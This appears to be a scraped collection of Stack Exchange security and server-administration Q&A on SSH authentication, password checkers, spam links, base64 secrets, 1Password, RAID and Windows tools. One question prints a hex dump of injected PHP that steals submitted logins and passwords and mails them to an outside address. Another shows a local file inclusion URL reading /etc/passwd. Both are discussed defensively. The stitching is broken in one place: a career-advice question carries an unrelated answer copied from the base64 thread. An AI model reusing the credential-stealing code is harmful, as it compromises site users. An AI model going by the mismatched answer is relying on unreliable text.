Assume that I never check the server fingerprint when logging in to an SSH server. This means that certain configurations of SSH can be impersonated. For example, I can log into a server that only has my public key. Obviously this doesn't authenticate the server. But now suppose that SSH uses a private password. I am not familiar with the internals of SSH, but I would hope that the password challenge goes in both directions when both sides share the same common secret . Therefore, if I enter my password and the client allows the connection, then it has authenticated the server. Is this reasoning correct? Or is there still some way for someone without my password to impersonate the server?
... if I enter my password and the client allows the connection, then it has authenticated the server. Neither password based nor key based authentication of the client against the server will somehow authenticate the server. This is also true if the client's private key is protected by a password: the password will only be used locally on the client to use the private key on the client, but has nothing to do with successful or unsuccessful server authentication. In other words: not properly authenticating the server opens you up to server impersonation or man in the middle attacks, no matter which client authentication method is used. ... a private password. I am not familiar with the internals of SSH, but I would hope that the password challenge goes in both directions when both sides share the same common secret. That's not how password authentication in SSH works. With password authentication the server simply gets the password from the client and then checks it against the local (to server) authentication mechanism. Typically the password is not even known server side for checking it, but only a password hash is known. And maybe not even this, because the server might use an authentication backend like PAM , LDAP or Radius. So when the client does not properly authenticate the server in this case, then the wrong server (attacker) might end up with the client's password and can use it against the real server. A real shared common secret would be Pre-Shared Key , as known from WPA-PSK, IPSec or PSK authentication in TLS. In this mode the authentication can only succeed if both client and server know the same secret, but without some man in the middle able to sniff the secret. But PSK based authentication is not defined for SSH.
{ "source": [ "https://security.stackexchange.com/questions/266797", "https://security.stackexchange.com", "https://security.stackexchange.com/users/286296/" ] }
267,141
Is Rumkin.com's password tool a reliable tool for password strength checking? I am asking because: I am getting confusing suggestions: (the password in this example is 777 characters long) D. W.'s comment to Jeff Atwood's answer claims that Rumpkin's estimates are apparently bogus . Adam Katz's answer to my other question claims that password complexity detection tools are all wrong . So that would include Rumpkin's, try zxcvbn (that I've been using so far) and many / all others. Please, note that this is not a broad question on whether all password strength checkers are unreliable. This has been addressed many times. But rather specifically about Rumkin.com's password tool . I want to learn whether this tool's suggestion system is flawed or if (in any scenario) a 777-character password may be considered not long enough (and therefore whether any system can or rather should suggest making it even longer)?
Looking at the code of the site (which is not included in the linked github) it shows that the suggestion of making the passphrase longer is simply displayed always. From password-module.js (slightly beautified): { key: "viewSuggestions", value: function() { var t = [m("li", "Make the passphrase longer.")], r = this.strengthScore.charsets; return r.lower || t.push(m("li", "Add lowercase letters.")), r.upper || t.push(m("li", "Add uppercase letters.")), r.number || t.push(m("li", "Add numbers.")), r.punctuation || t.push(m("li", "Add punctuation.")), r.symbol || t.push(m("li", "Add symbols, such as ones used for math.")), t } } As can be seen - "Make the passphrase longer." is always included and all the others depending on the input. Is Rumkin.com's password tool a reliable tool for password strength checking? Your main point seem to be the strange suggestion that even a very long password should be made longer. As shown, this is not a suggestion you can rely on. It is not an actual harmful suggestion though. But after some sufficient complexity and length is reached, this recommendation adds no real value and instead causes confusion.
{ "source": [ "https://security.stackexchange.com/questions/267141", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11996/" ] }
267,335
I'm moderating one small Discourse forum and we, like everyone else, get spammers from time to time. Our forum is small, like 40-60 weekly unique visitors. Our forum requires that each new user's first post must be reviewed by a moderator before it appears and this catches most of the spammers. Recently we've been getting spammers posting to some older thread without contributing anything new, like writing: "Thank you. This solved my problem." While posts like these are suspicious, a moderator can't block them outright because they aren't against any rules and they might be coming from a legit user who has just created an account in order to thank someone for helping them out. Usually after their first post is published, the spammers come back a day or two later and they either make a new post or they edit their previous post to include "hidden links", like: Thank you[.](https://www.SomeRandomSpamURL.com/) This solved my problem[.](https://www.SomeOtherRandomSpamURL.com/) [.](https://www.EvenMoreRandomSpamURLs.com/)) I'm simply curious as to why would someone do this? I understand the purpose of regular spam links where the spammer tries to explicitly divert traffic to some site, but if the link is hidden behind a dot, then 99% of users likely won't ever realize there's a link to be clicked. If they do, then they'll likely realize it's a scam link. It's also not like someone could accidentally hit a dot on a forum post either. What are these spammers trying to gain by creating these "hidden" spam links?
It could be an attempt to boost the spam sites in search engine results by creating backlinks to it, which is a common SEO technique (although debatable how effective it is, as search engines can often detect this kind of dodgy behaviour).
{ "source": [ "https://security.stackexchange.com/questions/267335", "https://security.stackexchange.com", "https://security.stackexchange.com/users/287262/" ] }
267,390
I created an online account and received the usual welcome email. In addition, however, an "Undelivered Mail Returned to Sender" email appeared in my inbox one second later. I am the supposed sender, and the website I registered on the recipient. The email which could not be delivered contains (in plain text as well as in a .csv attachment) all the information I had entered upon registration. The website itself seems trustworthy/legitimate. Since I definitely did not send an email (and do not see an email in my outbox or sent folder), I wonder how this is possible and whether this poses a security risk. I found a related question here on this site ( i-received-an-undelivered-mail-is-my-email-address-used-maliciously ), but I can't quite connect the dots. It seems unlikely to me that my email was hacked or maliciously used at exactly that point of time. The password I used on the website was randomly generated and is almost surely unique among all my passwords. If the header was forged and someone was trying to deceive me that I had sent an email, I'd wonder why the email and attachments contained the information I entered upon account creation. If that was a third party, would this mean the website could be compromised? Again, the timing make me wonder if this is realistic. If it was a poorly configured foreign server, why would it appear as if I had tried to send an email with that specific content. The information, as far as I understand, should have been submitted/sent through the registration form. Why send another email with the same information? Why would it appear as if the email was sent from my email address? I would appreciate if someone could shed some more light on this. Please find part of the email header (with my and the website's info anonymized) below. Please excuse the use of an image, but otherwise this post was classified as spam. I also found failed-to-send-emails-that-i-never-sent , but the context is quite different to mine. In my case, the undeliverable email seems to be specifically related the the registration on the website.
It looks like the web service in question has configured their system to forward the welcome emails to an internal address on their end, but misconfigured their system such that the From: line is the customer's address rather than some internal address that they control. Intentional or not, they also fail to consider DMARC , so customers wind up with sketchy-looking emails like this about the website trying to email on their behalf from an unauthorized host. You could help the service out by letting them know about the configuration issue, but ultimately things are working as they ought to as far as your email setup is concerned, so you are safe to just brush this off without consequence too. There does not appear to be any malicious intent, but the way the emails are sent with whatever PII it had is not exactly commendable. As for why they would do this, I'm imagining that they have a weirdly tacked-together process for taking information from their registration form and delivering it to another service via SMTP since there was a CSV attached. As long as the receiving address was controlled by them, my best guess is that they're handling registrations in a frustratingly unsafe, roundabout, and kludgy way for purposes of logging, debugging, "backups," or—shudder to think—processing. I'm also going to speculate that their Fiverr dev(s) received little oversight when stringing this together. In reality, though, this could just be that some developer had set this up as a meantime debugging measure and failed to disable it in production before anyone noticed. I'd email them.
{ "source": [ "https://security.stackexchange.com/questions/267390", "https://security.stackexchange.com", "https://security.stackexchange.com/users/287378/" ] }
267,592
Today this came to my attention. When generating random secrets for e.g. JWT (in node.js the most common way is using the crypto.randomBytes() method), I have noticed a lot of people save these tokens in a base64-encoded manner (i.e. crypto.randomBytes(len).toString('base64') . Charset However, I thought to my self: doesn't saving a random byte buffer in a base64 encoded string undermine the whole principle of them being 'random bytes'? Base64 has a charset of only 64 characters while the native crypto.randomBytes.toString() method supports 2^8 = 256 characters. Ratio Lets say we have a buffer with length n . For a not-base64-encoded buffer of n the encoded counterpart has the length of , which means a base64 encoded string has a overhead of approximately 133% their non encoded counterpart. Many of you already know this, but for those who don't know: each base64 character represents 6 bits ( ). 4 * 6 bits = 12 bits = 3 bytes. this means there are 4 characters encoded for a three byte buffer. However, I said approximately 133% because the output length is rounded up to a multiple of 4. This means that e.g. 1, 2, 3 bytes become 4 bytes; while 4, 5 and 6 are rounded up to 8 bytes. (this is the trailing = you see on base64 encoded buffers most of the time). Thus, the ratio is approximately 1 to 4 thirds (1:1.33) With the following explaination, what is the smartest thing to do? Saving the buffer itself (short with big charset) or saving the base64 encoded buffer (long with small charset)? Or doesn't it matter for bruteforce applications because the amount of bits is almost the same? Or is base64 even safer because base64 is always 0-2 characters longer? const crypto = require('crypto'); const random = crypto.randomBytes(128); const lenBuffer = random.length; const lenBase64 = encodeURI(random.toString('base64')).split(/%..|./).length - 1; console.log(lenBuffer, lenBase64); // 128 172 => 128 * 1.33 = 170 Edit: I might not have been clear in my question, my apologies. My primary question here is - what would be faster to bruteforce, the short and complex byte buffer or the longer and less complex base64 encoded string? According to password entropy the length and complexity are not equally proportional, for they are logaritmic instead.
It doesn't matter. A number doesn't change because you change the encoding of it. 101 2 and 5 10 is the same number, and contain the same amount of information. The reason we use base64 is that it is safe printable characters; they won't screw up your terminal if you output them to it, and they will transmit nicely in any computer system capable of handling 7-bit ASCII. The drawback is as you observed the increased overhead. Or doesn't it matter for brute force applications because the amount of bits is almost the same? Or is base64 even safer because base64 is always 0-2 characters longer? It's not almost the same. It is the same. Computers treat information as numbers – large numbers. If you represent that number as 8-bit bytes, each digit conveys 8 bits of information. If you represent that number as base64, each digit conveys 6 bits of information. It's still the same number , but the number of digits increased due to lower information content per digit. Your question is like asking which bus is the soonest: the one in 600 seconds, the one in ten minutes or the one in 10 minutes.
{ "source": [ "https://security.stackexchange.com/questions/267592", "https://security.stackexchange.com", "https://security.stackexchange.com/users/150123/" ] }
267,609
I am a mathematician, I have a PhD, I am specialised in stochastic processes, finance, pricing and arbitrage theory, I have publications in Q1 journals, but still, I feel that I am missing something ... Currently I work for academia as a researcher. However, I think I am interested in getting into security. I have always had a passion for algorithms and coding and solving riddles, and as a child I wanted to be a hacker. Could you suggest any specific list of steps I should take to get closer to a job in this area? Is it fine if I start with reading "The Web Application Hacker's Handbook"? I am good at math, I can write and read code (lot of experience in python and some in c++), and I think I am good at learning.
It doesn't matter. A number doesn't change because you change the encoding of it. 101 2 and 5 10 is the same number, and contain the same amount of information. The reason we use base64 is that it is safe printable characters; they won't screw up your terminal if you output them to it, and they will transmit nicely in any computer system capable of handling 7-bit ASCII. The drawback is as you observed the increased overhead. Or doesn't it matter for brute force applications because the amount of bits is almost the same? Or is base64 even safer because base64 is always 0-2 characters longer? It's not almost the same. It is the same. Computers treat information as numbers – large numbers. If you represent that number as 8-bit bytes, each digit conveys 8 bits of information. If you represent that number as base64, each digit conveys 6 bits of information. It's still the same number , but the number of digits increased due to lower information content per digit. Your question is like asking which bus is the soonest: the one in 600 seconds, the one in ten minutes or the one in 10 minutes.
{ "source": [ "https://security.stackexchange.com/questions/267609", "https://security.stackexchange.com", "https://security.stackexchange.com/users/287768/" ] }
268,318
I'm trying to understand why it's not necessary with MFA in 1Password when signing in to a new device. This was the case that triggered my curiosity: I created a 1Password account I downloaded the Mac application I installed the Chrome plugin I then went on my IPhone and installed the app there too. At step no 4 all I needed to provide was my 1Password-password. Why is this secure? Can't anyone download the 1Password IPhone app and try to guess my password? I'm guessing my understanding of their security model is seriously flawed, but I'm eager to learn more.
[ Disclosure: I work for AgileBits, the makers of 1Password; and I helped design the system you are describing ] The security model has some unfamiliar components, but it is presented to users like a normal login, so it is natural that you might think that this suffers from the security weaknesses of traditional logins. Secret Key As 4german correctly pointed out in their answer, your account password is combined on your client with something we call your Secret Key. When you created your account, a 128-bit random Secret Key was generated in your browser on your machine. If you generate your emergency kit, you will see your Secret Key in that. Your Secret Key is absolutely necessary for you to decrypt your data, so do save a copy of your Emergency Kit. We do have the Secret Key sync to other devices through end-to-end encrypted service that don’t pass through us. Apple’s iCloud Keychain is such a service. And so it made it onto your iPhone where it can be read only by iOS apps signed by AgileBits. It is important that the Secret Key is never handled by our servers, as it is designed to protect you if we were ever to be breached. Not a second factor In the instance you encountered, the Secret Key is kinda-sorta acting like a second factor, as you must be using a device which has received it independently of 1Password servers, but it is a mistake to think of it generally that way. The Secret Key is designed to protect you if your data is captured from our systems. It makes what we hold truly uncrackable. You can enable real 2FA for 1Password, which will require a second factor when you set up a new device. 2FA for unlocking encrypted data on an already enrolled device would be security theater. Client computation Your account password and your secret key are your user secrets that are used for two purposes. One purpose is to derive the keys needed to decrypt your data. 1Password can be used off-line this way. The other is to derive a an authentication key (which I will call x ). The process of deriving these keys from your user secrets is designed to be computationally expensive. So it inherently rate limits guessing, long before a sign in attempt is made to the server. Unlike traditional authentication, x is never sent to the server. Instead the server constructs a mathematical puzzle that can only be solved with knowledge of x . The puzzle is different each time you log in. Additionally, the server proves to the client that it knows a related secret, v . v was created by your client when you first signed up, and was sent to the server only at first enrollment. As with the client proving to knowledge of x , the server’s proof of knowledge of v is also a zero-knowledge proof. The server must solve a puzzle that can only be done with knowledge of v . What this all means What looks like traditional signin process to users is actually a far more secure system. You can enable 2FA for 1Password if you wish, but it protects you only from the attacker who Can guess your account password Has your Secret Key Does not have your encrypted data The circumstances in which both 2 and 3 might hold are rare.
{ "source": [ "https://security.stackexchange.com/questions/268318", "https://security.stackexchange.com", "https://security.stackexchange.com/users/289106/" ] }
268,435
I recently came across a php file on a compromised website that had what appeared (in Sublime Text) to be a huge white-space gap. When I run a diff against the original source file I can clearly see the malicious code which is snagging logins and passwords and emailing them to someone . The malicious code can also be clearly seen using vim. My assumption is that this is some kind of encoding exploit but I can't for the life of me figure out how it's being hidden and I've never seen anything like this before. Is anyone familiar with this kind of hidden code exploit? Is there a way to make it visible inside Sublime? I realize it may be difficult to say without seeing the file - I am happy to provide said file if need be. EDIT - Hex dump as requested: 0000000 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 * 00000c0 20 20 20 20 20 20 20 20 20 69 66 28 24 74 68 69 00000d0 73 2d 3e 75 73 65 72 2d 3e 6c 6f 67 69 6e 28 24 00000e0 74 68 69 73 2d 3e 72 65 71 75 65 73 74 2d 3e 70 00000f0 6f 73 74 5b 27 75 73 65 72 6e 61 6d 65 27 5d 2c 0000100 20 24 74 68 69 73 2d 3e 72 65 71 75 65 73 74 2d 0000110 3e 70 6f 73 74 5b 27 70 61 73 73 77 6f 72 64 27 0000120 5d 29 29 7b 24 73 6d 61 69 6c 3d 24 5f 53 45 52 0000130 56 45 52 5b 27 48 54 54 50 5f 48 4f 53 54 27 5d 0000140 2e 24 5f 53 45 52 56 45 52 5b 27 52 45 51 55 45 0000150 53 54 5f 55 52 49 27 5d 2e 22 7c 22 2e 24 74 68 0000160 69 73 2d 3e 72 65 71 75 65 73 74 2d 3e 70 6f 73 0000170 74 5b 27 75 73 65 72 6e 61 6d 65 27 5d 2e 22 7c 0000180 22 2e 24 74 68 69 73 2d 3e 72 65 71 75 65 73 74 0000190 2d 3e 70 6f 73 74 5b 27 70 61 73 73 77 6f 72 64 00001a0 27 5d 3b 6d 61 69 6c 28 22 61 6c 74 2e 65 69 2d 00001b0 36 6f 6b 36 77 36 76 32 40 79 6f 70 6d 61 69 6c 00001c0 2e 63 6f 6d 22 2c 24 5f 53 45 52 56 45 52 5b 27 00001d0 48 54 54 50 5f 48 4f 53 54 27 5d 2c 24 73 6d 61 00001e0 69 6c 2c 22 46 72 6f 6d 3a 20 61 64 6d 69 6e 40 00001f0 66 6c 79 2e 63 6f 6d 5c 72 5c 6e 52 65 70 6c 79 0000200 2d 74 6f 3a 20 61 6c 74 2e 65 69 2d 36 6f 6b 36 0000210 77 36 76 32 40 79 6f 70 6d 61 69 6c 2e 63 6f 6d 0000220 22 29 3b 0000223
The code is exploiting a flaw in Sublime to prevent text from being displayed. This is what part of the code looks like in Notepad++. It is obviously looking for post['username'] and post['password'] . And Notepad++ can handle even 7000 characters when word wrapping: The flaw is due to Sublime's incorrect word wrap behavior. The 200 leading spaces indents the text far off the screen while also disabling the horizontal scrollbar due to "word wrap", but it actually isn't wrapping any of the text due to treating the 200 spaces as an indent. Zooming out or turning off word wrap would've displayed the text fine. Sublime has its own HexViewer and that has no problems displaying the code on the ASCII panel:
{ "source": [ "https://security.stackexchange.com/questions/268435", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71159/" ] }
268,607
I am initiating and doing a basic penetration testing course and have come across one doubt. For example in this URL: http://webapp.thm/index.php=?page=1 I get that I am requesting the index.php file in the server and I am specifying that I want to view page 1 as a value of the parameter. But in this other URL: http://webapp.thm/get.php?file=/etc/passwd I am having trouble understanding this request because I am requesting get.php (which is already a file) and the parameter file is accesing a different file /etc/passwd . My question is what does the get.php file contain in this case or is it a function? because it seems to me that it is function retrieving the /etc/passwd , but I know that it is not a function, so I am kind of confused about what the get.php means. got a picture describing it from the course:
I am requesting get.php(which is already a file) HTTP is not about requesting files, but about requesting resources specified by the URL. These resources might be a static file returned by the web server but they might also be created dynamically based on the URL. In this specific case you are not requesting the contents of the file get.php to be returned, but you request the program get.php to be executed. And file=/etc/passwd is processed by this program - how exactly depends on the program. Based on your description the program will likely take it as a parameter file with the value /etc/passwd , open the file and return it as response. If this succeeds, this is known as a Local File Inclusion vulnerability (LFI).
{ "source": [ "https://security.stackexchange.com/questions/268607", "https://security.stackexchange.com", "https://security.stackexchange.com/users/289649/" ] }
268,850
I noticed that, while browsing through many bug bounty and vulnerability disclosure programs, they don't accept issues that are related to TLS/SSL, which includes expired security certificates. Why are companies so unwilling to accept expired certificates, which can easily be fixed?
Why are companies so unwilling to accept expired certificates, which can easily be fixed? With proper certificate validation a client will not connect to a server which provides an expired certificate. This means that no data will be exchanged over the improperly secured connection. This also means that there is no actual security problem - only an availability problem. Sure, there are clients which might ignore that the certificate is expired or users which skip browsers warnings. But in this case the real issue as improper certificate validation at the client side, not the expired certificate.
{ "source": [ "https://security.stackexchange.com/questions/268850", "https://security.stackexchange.com", "https://security.stackexchange.com/users/279053/" ] }
21
What's the top the reason you're unable - or unwilling - to upgrade to the latest available operating system verions?
The current one just works!
{ "source": [ "https://serverfault.com/questions/21", "https://serverfault.com", "https://serverfault.com/users/32/" ] }
24
Originally my system had two SATA disk drives - I added an extra SATA disk drive to my system and when accessing this disk it sometimes take about 50 times longer to access the drive. (Windows Explorer can take about 2 mins to populate the basic directory and there is nothing special about the directory) This doesn't happen all the time, but can't identify a pattern at the moment. Any ideas what I've done wrong? (Using Windows Vista Home Premium - PC is custom made - this is just on my development PC. What other useful info can I give?)
The current one just works!
{ "source": [ "https://serverfault.com/questions/24", "https://serverfault.com", "https://serverfault.com/users/54/" ] }
30
Users can't get to their e-mail, the CEO can't get to the company's home page, and your pager just went off with a "911" code. What do you do when everything blows up?
The first answer is stay calm! I learned that the hard way that panicking often just makes things worse. Once thats achieved the next thing is to actually ascertain what the problem is. Complaints from users and managers will be coming at you from all angles, telling you what THEY cannot do, but not what the problem is. Once you know the problem you can start the plan to fix it and start giving your angry users a timescale!
{ "source": [ "https://serverfault.com/questions/30", "https://serverfault.com", "https://serverfault.com/users/32/" ] }
42
Say I've got a fresh install of Ubuntu, what steps should I take to secure it for use as a Rails application server?
I can't think of any Ubuntu-specific tweaks, but here's a few that apply to all distributions: Uninstall all unnecessary packages Use public-key only authentication in SSH Disable root logins via SSH (doesn't apply to Ubuntu) Use the production settings for PHP (php.ini-recommended) Configure MySQL to use sockets only Of course this list isn't complete, and you'll never be completely safe, but it covers all the exploits I have seen in real life. Also, the exploits I have seen were almost always related to unsecure user code, not unsecure configuration. The default configurations in minimal, server distributions tend to be pretty secure.
{ "source": [ "https://serverfault.com/questions/42", "https://serverfault.com", "https://serverfault.com/users/75/" ] }
44
For a more comprehensive list of monitoring tools and their features, check out this Wikipedia page . As the question states, what are the most commonly used tools used for this task and what are their strengths and weaknesses?
I've used Nagios in the past with success. It's very extensible (over 200 add-ons), relatively easy to use and lots of reports. A negative would be the initial setup.
{ "source": [ "https://serverfault.com/questions/44", "https://serverfault.com", "https://serverfault.com/users/22/" ] }
86
There seems to be a lot of confusion around having multiple partitions for Windows. Some of the theories I have heard are It's faster to move to a new partition start than searching for a file start If you need to format it's easier since the data is on the other partition Putting swap file on a separate partition increases performance File/Folder level security Generally I found the data one to be true, but in that scenario I would rather have separate disks since those will be faster. In short my question is, is there any truth to the above theories and are there any other reasons to partition a disk?
One of the primary reasons I use different partitions is that of separating the data from the OS. Should you need to re-install windows (which we all know is quite likely) at any point you can do so without needing to move your data off to somewhere else. As partitions on the same disk will be using the same spindle theres very little to be gained in terms of speed with partitioning a single disk.
{ "source": [ "https://serverfault.com/questions/86", "https://serverfault.com", "https://serverfault.com/users/103/" ] }
190
We're considering building a ~16TB storage server. At the moment, we're considering both ZFS and XFS as filesystem. What are the advantages, disadvantages? What do we have to look for? Is there a third, better option?
I've found XFS more well suited to extremely large filesystems with possibly many large files. I've had a functioning 3.6TB XFS filesystem for over 2 years now with no problems. Definitely works better than ext3, etc at that size (especially when dealing with many large files and lots of I/O). What you get with ZFS is device pooling, striping and other advanced features built into the filesystem itself. I can't speak to specifics (I'll let others comment), but from what I can tell, you'd want to use Solaris to get the most benefit here. It's also unclear to me how much ZFS helps if you're already using hardware RAID (as I am).
{ "source": [ "https://serverfault.com/questions/190", "https://serverfault.com", "https://serverfault.com/users/196/" ] }
214
I have always used hardware based RAID because it (IMHO) is on the right level (feel free to dispute this), and because OS failures are more common to me than hardware issues. Thus if the OS fails the RAID is gone and so is the data, whereas - on a hardware level regardless of OS - the data remains. However on a recent Stack Overflow podcast they stated they would not use hardware RAID as software RAID is better developed and thus runs better. So my question is, is there any reasons to choose one over the other?
I prefer HW raid, 'cause if you have to pull good disks out of a dead machine you're not limited to the OS configuration of the raid "array". You do keep backups of your RAID controllers config, don't you? So just load that up on a donor machine, slot in the drives (in the right order! You did label your drives before your pulled them right?) and restart on a clean OS and your data is recovered. THE OS DRIVES ARE NOT IMPORTANT DRIVES TO KEEP. THE MOST IMPORTANT STUFF TO KEEP IS THE DATA DRIVES!!!! (You do backup your DATA drives, right?)
{ "source": [ "https://serverfault.com/questions/214", "https://serverfault.com", "https://serverfault.com/users/103/" ] }
238
Sometimes I have to answer support calls responding to PC crashes with blue screens. How can I effectively narrow down the problem giving the information on that screen? What are the most important questions I have to ask the user? Edit: By "diagnose" I mean, how can I interpret the information on the blue screen in order to narrow down the cause of the problem?
When the computer bluescreens it'll most likely create a dump of the memory. The content from memory is written to the Pagefile as the system is going down. It uses the Pagefile as placeholder for the data since it is too dangerous to try to create a new file on disk. When the machine starts up again it'll detect the dump, and move the data into a separate dump file (typically C:\Windows\Memory.dmp or C:\Windows\Minidumps*.dmp). Install WinDbg and open the .dmp file. Click the !Analyze link. Now it'll show you the stack from the thread that killed Windows, and show you which files that were involved. Often WinDbg will point you directly at a specific driver file. You can find step-by-step instructions here . I can recommend reading Mark Russinovich's blog and books. You can download WinDbg from Microsoft . So the question to the user is: "Can you e-mail me your dump file?"
{ "source": [ "https://serverfault.com/questions/238", "https://serverfault.com", "https://serverfault.com/users/45/" ] }
261
I have been on the lookout lately for some good tools to fill up my flash drive and I thought I would ask the Server Fault community for recommendations on good tools that will fit onto a thumb drive. Some I use are Driver Packs , CCleaner and the portable apps suite .
These are the utilities I have on my drive: CurrPorts displays the list of all currently opened TCP/IP and UDP ports on your local computer. ftpserver3lite is an FTP server ftpwanderer2 is an FTP client ipnetinfo answers questions about an IP address: owner, country/state, range, contact info, etc. miranda general messaging solution (supports most P2P messaging networks) omziff encryption decryption tool. FoxitReader wonderful alternative to adobe's PDF reader. light and fast and portable. Qm (The Quick Mailer) if you just want to send an Email the old pasion way with no installation. Restoration quick and basic undelete utility. smsniff basic TCP sniffer. torpark a Firefox-based browser for completely discrete browsing. treepad just a nice utility to organize your data in, much like freemind and other mind maps . cpicture a picture viewer DriveMan for managing hard drives on the local computer. FollowMeIPLite very much like www.whatismyip.com only much quicker. hfs opens a small HTTP file server from desired folder, for instant file sharing. angry ip scanner scans IP's kill.exe - needs no introduction :) putty a telnet utility every system administrator has got to be familiar with. startup control panel , StartupList , regcleaner - really there are many registry cleaners/managers out there, lots of them fits nicely in a thumb-drive. Revealer reveals passwords from password fields. It is very useful in many situations. vncviewer client for the VNC remote desktop protocol WinAudit audits a Windows machine. Lots of useful information. xcopy.exe - it is still useful to have around. TcpView shows all all TCP and UDP endpoints on your system. Beyond Compare is fantastic, btw. Also, you might want to check out portable freeware .
{ "source": [ "https://serverfault.com/questions/261", "https://serverfault.com", "https://serverfault.com/users/123/" ] }
331
What do I have to consider when I'm planning a new server room for a small company (30 PCs, 5 servers, a couple of switches, routers, UPS...)? What are the most important aspects in order to protect the hardware? What things do not belong in a server closet? Edit: You may also be interested in this question: Server Room Survival Kit . Thank you!
Enough space for expansion Plenty of network ports Sufficient network bandwidth Plenty of dedicated power sockets Should not be on the ground floor (risk of flooding + less secure) Fire suppression facilities + smoke alarms IP KVM for remote access Telephone (so the operator can call a support line while looking at the hardware) Pens + paper A label printer - label everything! A standard printer (nice to have) Spare network and power cables Air conditioning (also dehumidifies) Good UPS (with automated/controlled shutdown functionality) Sufficient power to run everything (and enough for expansion) Entrance security (preferably also with logging) Physical security (security on windows, entrance, etc.) Whiteboard (nice to have) Fireproof safe (for storing backup tapes, passwords and installation media) Good server racks - well maintained (cabling) Enough space to work comfortably behind the servers A table large enough to build/dismantle a server on (plus monitor, keyboard and mouse) At least 1 chair Tidy patch panel (especially if you patch to PC's and telephones in the office) Good lighting
{ "source": [ "https://serverfault.com/questions/331", "https://serverfault.com", "https://serverfault.com/users/45/" ] }
403
It seems to me that since RAID volumes are logical (as opposed to physical), the layout that the OS believes they have might not correspond to the actual phsyical layout. So does defrag make sense for RAID?
Yes, defrag does still make sense for RAID. While it's true that the layout the OS sees isn't the same as the physical layout, it's monotonic, ie the virtual sectors are in the same order on the disk as they are on the array, it's just they are scattered across disks. Also, the RAID controller will use predictive caching (if it has it) based on an understanding of the array layout, so that will work better if you have defrag. The only time you don't need to defrag is if the underlying storage medium is random access, so don't defrag your USB key, and don't defrag an SSD.
{ "source": [ "https://serverfault.com/questions/403", "https://serverfault.com", "https://serverfault.com/users/370/" ] }
468
Title says it all. For personal usage, I tend to prefer Debian/Ubuntu over Redhat. It's not necessarily that I dislike Redhat (or more specifically CentOS or Fedora) so much as it is that I like Debian's package management system so much better. What are the reasons why Redhat is so popular? (And just to be clear, I'm asking because I genuinely want to know what the reasons are. So no flame wars!)
In the early days of Linux being taken more seriously in the everyday business world there was always a nervousness that followed mention of the name. Tech employees found that "It was started by a university student in his basement" wasn't the best way to sell the idea of an Open Source operating platform to management. The need for a solid company backing Linux alternatives was filled by Red Hat in those early days and probably had the single biggest impact on Linux for the Corporate Masses. They were able to provide support solutions along with their own branded versions of the OS. Thanks to their early success with the full range of Linux uses from personal to corporate, they built up a huge amount of momentum and a recognisable brand which remains with them to this day, even with competition from other big names like Novell.
{ "source": [ "https://serverfault.com/questions/468", "https://serverfault.com", "https://serverfault.com/users/405/" ] }
612
We always use IIS' FTP service but recently we have had a few problems with it; what FTP service do you recomend for IIS? We use Windows Server and Windows XP in the clients. A free version is a must, We are now considering FileZilla and WarFtp, We will be having 100 concurrent connections.
Filezilla; it's free, easy to set up and manage but very powerful. Ability to use non directory users is a big plus.
{ "source": [ "https://serverfault.com/questions/612", "https://serverfault.com", "https://serverfault.com/users/367/" ] }
720
I am looking for others' list of program that absolutely must be installed to a fresh install of Windows before going any further. I hope to compile a list here to use as reference for all new Windows installs/restores. Automating this list of programs installation is the next step. Some great lists so far! I will continue to monitor this and then make a list of everything I use. Another thought, has anyone come up with a way to automate this? Possibly going to each programs download page, downloading the most recent version, and installing? I may way on this as well, any ideas would be appreciated! As far as the type of machine, most of mine are hybrids i.e- server, workstation, development machine. So all of the above!
Basically, here is my software list (maybe not completly up to date) : Edition Pspad : A free and really powerful editor. NVU : An HTML editor. Kompozer : The NVU bug-fixes release. System Process Explorer : Replace the default windows task manager by Process Explorer! Autoruns : Want to know what is launched when Windows starts? Try autoruns! CubicExplorer : An alternative to the Windows Explorer, with bookmarks, tabs... Supercopier : Replace the default copy tool of Windows. Unlocker : A process is locking a resource on your disk? Use unlocker to solve this problem. Console² : Change the DOS command for Console², with tabs, better UI... Taskbar shuffle : Rearrange the programs on your Windows taskbar by dragging and dropping them. Tools Stroke It : Execute commands, start programs only with a mouse gesture! Magic! 7-zip : A free file archiver. Ditto : A copy-paster manager, to not be limited to one element in your clipboard. Dirkey : Use Ctrl-0 to Ctrl-9 to access your preferred directories on your disks on Windows Explorer. Print screen : A free tool to create screenshots, with a lot of options... Launchy : Type Ctrl-Space, then write the first letters of the application, and it's launched! Keybreeze : Almost the same thing as Launchy. PDF Creator : To transform any document to the PDF format (a new printer is added in your configuration). Development Tortoise CVS : A CVS extension for Windows Explorer. Eclipse : Java development IDE. Netbeans : Another Java development IDE, much better as Eclipse when you need to create Java application with Swing (this is my opinion ;o) ). Multimedia Foobar 2000 : A powerful media player. But needs a lot of configuration... XnView : A powerful image viewer. Also offers lot of conversion controls. Internet Mozilla Firefox : THE browser. Mozilla Thunderbird : A really good email reader. Trillian , Koolim , Pidgin (ex Gaim), Meebo (online): Instant Messenger tool. Firefox plugin Colorzilla : A color picker, to find out the color code of any part of the current page. Download statusbar : A download manager. Firebug : An extension for Javascript or CSS debugging. An extension for Internet Explorer that does almost the same thing: IE Developer Toolbar . IE Tab : View pages with the Internet Explorer engine. Measure It : A ruler to measure web components of a page. PDF download : A PDF manager. Sage : A RSS Viewer. Stop or reload : Stop and Reload buttons are now located on the same button. Tab mix plus : Options for tabs management. Web developer : Lot of tools for web development. Edited to add links, as requested.
{ "source": [ "https://serverfault.com/questions/720", "https://serverfault.com", "https://serverfault.com/users/598/" ] }
723
There are several cloud service providers. But, if you're going to design an app that runs on their infrastructure, you have to have confidence that they are going to be around for a while, and that they are going to continue to offer the service. For example, Google might decide that AppEngine isn't profitable and close it in a year (like many of their non-profitable "20%" projects). Cash strapped startups might not make it through the current economic downturn and be forced to close down. So, who do you trust in the cloud?
